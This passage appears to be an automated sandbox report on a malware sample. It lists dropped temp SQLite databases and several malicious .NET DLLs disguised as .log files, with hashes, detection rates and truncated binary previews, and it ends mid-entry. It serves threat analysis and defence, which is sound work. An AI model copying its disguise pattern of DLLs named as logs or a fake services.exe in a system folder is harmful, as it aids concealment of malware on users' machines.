                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\wFCZmLDTzn

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\wMmH2lN0Y0

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\wNz64yDfH9

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\xGiFhyWMeG

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\xJeXUfStRj

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\xUNavh1wji

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\xZw5g2XZM7

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\xgF4ZyUJOP

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\yZFhdsogzy

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ya7Rg9ioZE

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ygfZnxQz1c

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\yj62UCsbmR

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\zYDXjqUiwz

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\zYwWa3TQER

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\zsgVqegTCY

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\Desktop\BKAMFwmA.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):50176
                                                              Entropy (8bit):5.723168999026349
                                                              Encrypted:false
                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\BwIEkNWR.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):5.932541123129161
                                                              Encrypted:false
                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                              C:\Users\user\Desktop\DujMFNlM.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):64000
                                                              Entropy (8bit):5.857602289000348
                                                              Encrypted:false
                                                              SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                              MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                              SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                              SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                              SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\EvgdMKxt.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38912
                                                              Entropy (8bit):5.679286635687991
                                                              Encrypted:false
                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\FsHliKMo.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34816
                                                              Entropy (8bit):5.636032516496583
                                                              Encrypted:false
                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\HhBLiJAA.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.660491370279985
                                                              Encrypted:false
                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                              MD5:240E98D38E0B679F055470167D247022
                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\HpleNtbG.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34304
                                                              Entropy (8bit):5.618776214605176
                                                              Encrypted:false
                                                              SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                              MD5:9B25959D6CD6097C0EF36D2496876249
                                                              SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                              SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                              SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\IzFuDcGk.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):70144
                                                              Entropy (8bit):5.909536568846014
                                                              Encrypted:false
                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
